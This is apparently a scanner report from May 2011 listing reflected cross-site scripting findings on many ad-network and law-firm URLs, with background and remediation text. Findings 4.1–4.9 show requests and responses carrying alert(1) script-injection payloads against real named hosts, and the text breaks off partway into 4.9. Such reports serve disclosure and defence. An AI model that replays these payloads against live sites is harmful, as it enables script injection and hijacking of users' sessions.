http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]
http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]
http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
http://ads1.revenue.net/j [r_num parameter]
http://ads1.revenue.net/j [site_id parameter]
http://adserving.cpxinteractive.com/st [ad_size parameter]
http://adserving.cpxinteractive.com/st [pop_frequency parameter]
http://adserving.cpxinteractive.com/st [pop_times parameter]
http://adserving.cpxinteractive.com/st [section parameter]
https://ams-legal.net/support/Login.asp [userid parameter]
http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]
http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]
http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]
http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]
http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]
http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]
http://da.newstogram.com/hg.php [callback parameter]
http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]
http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]
http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]
http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]
http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]
http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]
http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]
http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://kona40.kontera.com/KonaGet.js [l parameter]
http://kona40.kontera.com/KonaGet.js [rId parameter]
http://lfov.net/webrecorder/g/chimera.js [vid parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]
http://wd.sharethis.com/api/getCount2.php [cb parameter]
http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]
http://wd.sharethis.com/api/getCount2.php [url parameter]
http://webezines.kwithost.com/sx25Feed.php [callback parameter]
http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]
http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]
http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]
http://www.bloomberg.com/apps/data [sgid parameter]
http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]
http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]
http://www.hbsr.com/contact_us/index [REST URL parameter 1]
http://www.hbsr.com/contact_us/index [REST URL parameter 2]
http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]
http://www.hbsr.com/favicon.ico [REST URL parameter 1]
http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]
http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]
http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]
http://www.hbsr.com/news_events/index [REST URL parameter 1]
http://www.hbsr.com/news_events/index [REST URL parameter 2]
http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]
http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]
http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]
http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]
http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]
http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]
http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]
http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]
http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]
http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]
http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]
http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]
http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]
http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]
http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]
http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]
http://www.stroock.com/sitecontent.cfm [contentID parameter]
http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]
http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]
http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]
http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]
http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]
http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]
http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]
http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]
http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]
http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]
http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]
http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]
http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]
http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]
http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]
http://adserving.cpxinteractive.com/st [Referer HTTP header]
http://da.newstogram.com/hg.php [DMUserTrack cookie]
http://seg.sharethis.com/getSegment.php [__stid cookie]
http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]
http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]
http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]
http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://207.56.166.97
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f79e7"><script>alert(1)</script>1553382093a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof79e7"><script>alert(1)</script>1553382093a HTTP/1.1
Host: 207.56.166.97
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:41:46 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/favicon.icof79e7"><script>alert(1)</script>1553382093a');" title="Email Page">
...[SNIP]...

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://207.56.166.97
Path:	/javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74711"><script>alert(1)</script>5c2b4746530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://207.56.166.97
Path:	/javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e62"><script>alert(1)</script>08c4388e43e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e');" title="Email Page">
...[SNIP]...

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25012"><script>alert(1)</script>0614a672642 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=25012"><script>alert(1)</script>0614a672642 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423009; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=25012"><script>alert(1)</script>0614a672642http://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191ab'%3balert(1)//d0c8695572d was submitted in the @CPSC@ parameter. This input was echoed as 191ab';alert(1)//d0c8695572d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=191ab'%3balert(1)//d0c8695572d HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423011; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4559
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
e('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_multiclick=clickTAG1&click=191ab';alert(1)//d0c8695572dhttp://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
...[SNIP]...

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b203b'-alert(1)-'669cb54d170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&b203b'-alert(1)-'669cb54d170=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423027; expires=Sat, 11 May 2013 23:37:21 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:21 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4308
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&ml_multiclick=clickTAG1&click=&b203b'-alert(1)-'669cb54d170=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
clickTAGs += '&swfPATH=' + escape('http://ad.amtk-media.com/xl/PROD/17298
...[SNIP]...

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 986e2"><script>alert(1)</script>7e56d92a0c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&986e2"><script>alert(1)</script>7e56d92a0c0=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:20 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423020; expires=Sat, 11 May 2013 23:37:20 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:20 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4355
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&click=&986e2"><script>alert(1)</script>7e56d92a0c0=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.8. http://ad.amtk-media.com/iframe [target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf39"><script>alert(1)</script>7af5e74697d was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blankaaf39"><script>alert(1)</script>7af5e74697d&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:18 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422991; expires=Sat, 11 May 2013 23:37:18 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:18 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blankaaf39"><script>alert(1)</script>7af5e74697d" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=http://www.amtrak.c
...[SNIP]...

4.9. http://ad.amtk-media.com/iframe [target parameter] previous next

Summary

